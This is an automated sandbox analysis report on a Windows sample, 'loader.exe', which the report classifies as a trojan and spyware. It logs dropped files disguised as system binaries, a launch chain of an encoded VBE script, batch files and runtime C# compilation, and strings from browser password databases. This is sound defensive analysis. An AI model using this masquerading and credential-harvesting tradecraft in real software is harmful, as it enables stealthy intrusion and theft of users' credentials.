RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: RuntimeBroker.exe, 00000011.00000002.3463672667.00000000149BB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013648000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000145EB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013B63000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014183000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013939000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013ACB000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014922000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001473A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014552000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013E4B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014B0A000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014BA3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001421B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.00000000147D3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013DB3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.000000001436B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014033000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000013F9B000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, 00000011.00000002.3463672667.0000000014403000.00000004.00000800.00020000.00000000.sdmp, ILsVoJuzGv.17.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                                    System Summary

                                    barindex
                                    PE file has nameless sections
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Source: loader.exeStatic PE information: section name:
                                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_04FF6859 NtQueryInformationProcess,GetSystemInfo,0_2_04FF6859
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\Performance\WinSAT\DataStore\b8bba6a6aa94c9Jump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\DiagTrack\Scenarios\dasHost.exeJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\DiagTrack\Scenarios\21b1a557fd31ccJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\LiveKernelReports\RuntimeBroker.exeJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Windows\LiveKernelReports\9e8d7a4ca61bd9Jump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMPJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: c:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile deleted: C:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMPJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0063848E0_2_0063848E
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006340FE0_2_006340FE
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006400B70_2_006400B7
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006440880_2_00644088
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006471530_2_00647153
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006551C90_2_006551C9
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006332F70_2_006332F7
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006462CA0_2_006462CA
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006443BF0_2_006443BF
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0063F4610_2_0063F461
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0065D4400_2_0065D440
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0063C4260_2_0063C426
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006477EF0_2_006477EF
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0063286B0_2_0063286B
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0065D8EE0_2_0065D8EE
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006619F40_2_006619F4
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0063E9B70_2_0063E9B7
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00646CDC0_2_00646CDC
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00643E0B0_2_00643E0B
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_0063EFE20_2_0063EFE2
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_00654F9A0_2_00654F9A
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D10B60_2_006D10B6
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006DB2980_2_006DB298
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_006D04240_2_006D0424
                                    Source: C:\Users\user\Desktop\loader.exeCode function: 0_2_04FF45690_2_04FF4569
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeCode function: 5_2_00007FFD343F0D485_2_00007FFD343F0D48
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeCode function: 5_2_00007FFD343F0E435_2_00007FFD343F0E43
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeCode function: 5_2_00007FFD343F13555_2_00007FFD343F1355
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD343E0D4817_2_00007FFD343E0D48
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD343E0E4317_2_00007FFD343E0E43
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD343E135517_2_00007FFD343E1355
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A60BC17_2_00007FFD344A60BC
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A391017_2_00007FFD344A3910
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A4D1117_2_00007FFD344A4D11
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A411417_2_00007FFD344A4114
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A35AC17_2_00007FFD344A35AC
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A49D417_2_00007FFD344A49D4
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A658617_2_00007FFD344A6586
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A522417_2_00007FFD344A5224
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A465C17_2_00007FFD344A465C
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A361417_2_00007FFD344A3614
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A6BA417_2_00007FFD344A6BA4
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A337417_2_00007FFD344A3374
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A4F8417_2_00007FFD344A4F84
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A1C2017_2_00007FFD344A1C20
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A345417_2_00007FFD344A3454
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A6C4817_2_00007FFD344A6C48
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD344A2FFC17_2_00007FFD344A2FFC
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD347D087917_2_00007FFD347D0879
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD347D58A917_2_00007FFD347D58A9
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD347DCAC017_2_00007FFD347DCAC0
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeCode function: 17_2_00007FFD34909B4D17_2_00007FFD34909B4D
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeCode function: 20_2_00007FFD343D0D4820_2_00007FFD343D0D48
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeCode function: 20_2_00007FFD343D0E4320_2_00007FFD343D0E43
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeCode function: 20_2_00007FFD343D135520_2_00007FFD343D1355
                                    Source: C:\Recovery\conhost.exeCode function: 21_2_00007FFD34400D4821_2_00007FFD34400D48
                                    Source: C:\Recovery\conhost.exeCode function: 21_2_00007FFD34400E4321_2_00007FFD34400E43
                                    Source: C:\Recovery\conhost.exeCode function: 21_2_00007FFD3440135521_2_00007FFD34401355
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeCode function: 22_2_00007FFD343E0D4822_2_00007FFD343E0D48
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeCode function: 22_2_00007FFD343E0E4322_2_00007FFD343E0E43
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeCode function: 22_2_00007FFD343E135522_2_00007FFD343E1355
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeCode function: 23_2_00007FFD343D0D4823_2_00007FFD343D0D48
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeCode function: 23_2_00007FFD343D0E4323_2_00007FFD343D0E43
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeCode function: 23_2_00007FFD343D135523_2_00007FFD343D1355
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeCode function: 24_2_00007FFD343D0D4824_2_00007FFD343D0D48
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeCode function: 24_2_00007FFD343D0E4324_2_00007FFD343D0E43
                                    Source: C:\Windows\DiagTrack\Scenarios\dasHost.exeCode function: 24_2_00007FFD343D135524_2_00007FFD343D1355
                                    Source: C:\Recovery\conhost.exeCode function: 25_2_00007FFD343E0E0625_2_00007FFD343E0E06
                                    Source: C:\Recovery\conhost.exeCode function: 25_2_00007FFD343E14A925_2_00007FFD343E14A9
                                    Source: C:\Recovery\conhost.exeCode function: 25_2_00007FFD343E1A7E25_2_00007FFD343E1A7E
                                    Source: C:\Recovery\conhost.exeCode function: 25_2_00007FFD343E133825_2_00007FFD343E1338
                                    Source: C:\Recovery\conhost.exeCode function: 25_2_00007FFD343E12F425_2_00007FFD343E12F4
                                    Source: C:\Recovery\conhost.exeCode function: 25_2_00007FFD343E13C025_2_00007FFD343E13C0
                                    Source: C:\Recovery\conhost.exeCode function: 25_2_00007FFD343E137C25_2_00007FFD343E137C
                                    Source: C:\Recovery\conhost.exeCode function: 25_2_00007FFD343E140425_2_00007FFD343E1404
                                    Source: C:\Recovery\conhost.exeCode function: 25_2_00007FFD343E141125_2_00007FFD343E1411
                                    Source: C:\Recovery\conhost.exeCode function: 25_2_00007FFD343D0D4825_2_00007FFD343D0D48
                                    Source: C:\Recovery\conhost.exeCode function: 25_2_00007FFD343D0E4325_2_00007FFD343D0E43
                                    Source: C:\Recovery\conhost.exeCode function: 25_2_00007FFD343D135525_2_00007FFD343D1355
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeCode function: 26_2_00007FFD343D0D4826_2_00007FFD343D0D48
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeCode function: 26_2_00007FFD343D0E4326_2_00007FFD343D0E43
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeCode function: 26_2_00007FFD343D135526_2_00007FFD343D1355
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BLdnhdFQ.log 75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                    Source: C:\Users\user\Desktop\loader.exeCode function: String function: 006C4264 appears 65 times
                                    Source: C:\Users\user\Desktop\loader.exeCode function: String function: 0064EB78 appears 36 times
                                    Source: C:\Users\user\Desktop\loader.exeCode function: String function: 0064F5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\loader.exeCode function: String function: 0064EC50 appears 55 times
                                    Source: kmFpzVgz.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: keVXUmFt.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: SSuSBQke.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: BLdnhdFQ.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: ZPhRdffT.log.5.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: PHEbWhMM.log.17.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: JgiUHXBa.log.17.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: pOvooSqL.log.17.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: XCTiUwVw.log.17.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: OTzTkTQO.log.17.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
                                    Source: loader.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs loader.exe
                                    Source: loader.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: chainPorthostCommon.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: tQESKTdysPpsVzUyXTE.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: conhost.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: dasHost.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: csrss.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: RuntimeBroker.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: loader.exeStatic PE information: Section: ZLIB complexity 0.997276135089686
                                    Source: loader.exeStatic PE information: Section: ZLIB complexity 0.9948459201388888
                                    Source: loader.exeStatic PE information: Section: cheat ZLIB complexity 0.9968048443434617
                                    Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@35/291@2/1
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Program Files (x86)\microsoft\csrss.exeJump to behavior
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\Desktop\kmFpzVgz.logJump to behavior
                                    Source: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exeMutant created: NULL
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3472:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4828:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4232:120:WilError_03
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeMutant created: \Sessions\1\BaseNamedObjects\Local\DCR_MUTEX-eaeo9JEo1ruqi45TCDYM
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_03
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeFile created: C:\Users\user\AppData\Local\Temp\xiz5tqzrJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ServerWinRuntimeBroker\wJc3A8cK4hSMmtCgCMOA49.bat" "
                                    Source: C:\Users\user\Desktop\loader.exeCommand line argument: sfxname0_2_0064DF1E
                                    Source: C:\Users\user\Desktop\loader.exeCommand line argument: sfxstime0_2_0064DF1E
                                    Source: C:\Users\user\Desktop\loader.exeCommand line argument: STARTDLG0_2_0064DF1E
                                    Source: C:\Users\user\Desktop\loader.exeCommand line argument: xzh0_2_0064DF1E
                                    Source: C:\Users\user\Desktop\loader.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                    Source: loader.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Windows\LiveKernelReports\RuntimeBroker.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                    Source: C:\Users\user\Desktop\loader.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\loader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: CwbJ0mVCgt.17.dr, de3RQno5mm.17.dr, 0bAGSaIloU.17.dr, 71vf3aESwR.17.dr, nl7holVoK2.17.dr, 2xjfsQZ2Oh.17.dr, wZSuZ37Yxz.17.dr, bZmkMsPMuF.17.dr, iftkGTBA3n.17.dr, NXEWuyzxbY.17.dr, baAXtHnJu8.17.dr, WiIfdSYJo8.17.dr, WTJCl3vkX0.17.dr, HLtjQkDKgJ.17.dr, 7y7NgGczeq.17.dr, Nk3oF5AD7f.17.dr, inxWYTeNR8.17.dr, onXF6bxSWi.17.dr, Jup0iOChsz.17.dr, qDslv6SWQW.17.dr, AoeS8TOKyQ.17.dr, OlgNRJm9Kj.17.dr, mBv65Tg9xT.17.dr, DkSlZcNwi8.17.dr, 9YDkCEequl.17.dr, iXT0uoDdar.17.dr, mbBd912zD4.17.dr, tj5OZvDMsQ.17.dr, hVZA6YWOjg.17.dr, FlcsZpruRo.17.dr, ZrvfXFqFfB.17.dr, UMuv3DhKb6.17.dr, fulGOXAGc3.17.dr, SdOOWi3B5L.17.dr, 4n1B3EoqiD.17.dr, m5SDxSfTeE.17.dr, 4vX6yEeh4Q.17.dr, cJbHqVw7Nd.17.dr, 3hDm9jrtsr.17.dr, dBG31pxIKN.17.dr, 0kpuNgfS4z.17.dr, F5v0I4Bo7c.17.dr, jdeF0Imnon.17.dr, rRwKpR0eEh.17.dr, Ap5qYhZPvf.17.dr, KxTBxmfuHr.17.dr, BVY4CFkbFp.17.dr, uuegMOlRWI.17.dr, SYXCZQInFG.17.dr, pBAzMx9yU8.17.dr, rXYOrxVmy8.17.dr, XIKz5h0d1S.17.dr, U8s1VXJGab.17.dr, mLyVdUoRER.17.dr, g0cnN19Ln3.17.dr, 4C8vlfUZLp.17.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: loader.exeVirustotal: Detection: 76%
                                    Source: loader.exeReversingLabs: Detection: 68%
                                    Source: C:\Users\user\Desktop\loader.exeFile read: C:\Users\user\Desktop\loader.exeJump to behavior
                                    Source: unknownProcess created: C:\Users\user\Desktop\loader.exe "C:\Users\user\Desktop\loader.exe"
                                    Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ServerWinRuntimeBroker\wJc3A8cK4hSMmtCgCMOA49.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe "C:\ServerWinRuntimeBroker/chainPorthostCommon.exe"
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xiz5tqzr\xiz5tqzr.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBF2D.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC1E4D641D33A148FC98C6B9EA6A6669B1.TMP"
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\d135vvi0\d135vvi0.cmdline"
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC121.tmp" "c:\Windows\System32\CSCE59377155588453BA4975E271891CFF.TMP"
                                    Source: C:\ServerWinRuntimeBroker\chainPorthostCommon.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HArqwkOZhw.bat"
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\LiveKernelReports\RuntimeBroker.exe "C:\Windows\LiveKernelReports\RuntimeBroker.exe"
                                    Source: unknownProcess created: C:\Windows\DiagTrack\Scenarios\dasHost.exe "C:\Windows\DiagTrack\Scenarios\dasHost.exe"
                                    Source: unknownProcess created: C:\Recovery\conhost.exe "C:\Recovery\conhost.exe"
                                    Source: unknownProcess created: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe "C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe"
                                    Source: unknownProcess created: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe "C:\ServerWinRuntimeBroker\chainPorthostCommon.exe"
                                    Source: unknownProcess created: C:\Windows\DiagTrack\Scenarios\dasHost.exe "C:\Windows\DiagTrack\Scenarios\dasHost.exe"
                                    Source: unknownProcess created: C:\Recovery\conhost.exe "C:\Recovery\conhost.exe"
                                    Source: unknownProcess created: C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe "C:\Windows\Performance\WinSAT\DataStore\tQESKTdysPpsVzUyXTE.exe"
                                    Source: C:\Users\user\Desktop\loader.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ServerWinRuntimeBroker\OAKCwEsKnudXsAgphVRYMDBaoP2ZIjCO6J5QYyd0q81GMNjCqOkwlC1.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ServerWinRuntimeBroker\wJc3A8cK4hSMmtCgCMOA49.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ServerWinRuntimeBroker\chainPorthostCommon.exe "C:\ServerWinRuntimeBroker/chainPorthostCommon.exe"Jump to behavior
